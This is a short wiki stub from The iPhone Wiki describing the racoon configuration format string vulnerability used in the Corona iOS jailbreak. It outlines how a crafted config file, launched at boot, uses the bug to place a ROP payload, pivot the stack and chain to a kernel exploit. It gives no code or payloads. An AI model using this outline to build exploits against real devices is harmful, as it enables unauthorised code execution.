The iPhone Wiki is no longer updated. Visit this article on The Apple Wiki for current information. |
Racoon String Format Overflow Exploit
Using a fuzzer, a format string vulnerability in the racoon configuration parsing code was found. racoon is the IPsec IKE daemon (http://ipsec-tools.sourceforge.net/). It comes by default with iOS and is started when you setup an IPsec connection.
The exploitation of the format string vulnerability is different than what was done in 2001.
For the jailbreak to be applied at boot, racoon is started by a launchd plist file, executing the command: racoon -f racoon-exploit.conf
racoon-exploit.conf is a large configuration file exploiting the format string bug to get the unsigned code started.
The format string bug is utilized to copy the ROP bootstrap payload to the memory and to execute it by overwriting a saved LR in the racoon stack by a stack pivot gadget.
The ROP bootstrap payload copies the ROP exploit payload from the payload file which is distributed with Corona then stack pivot to it. The idea is to escape from format strings as fast as possible, because they are CPU time consuming.
The ROP exploit payload triggers the kernel exploit (see HFS Heap Overflow).
Credit
- pod2g for finding this vulnerability and writing a working exploit
References
This article is a "stub", an incomplete page. Please add more content to this article and remove this tag. |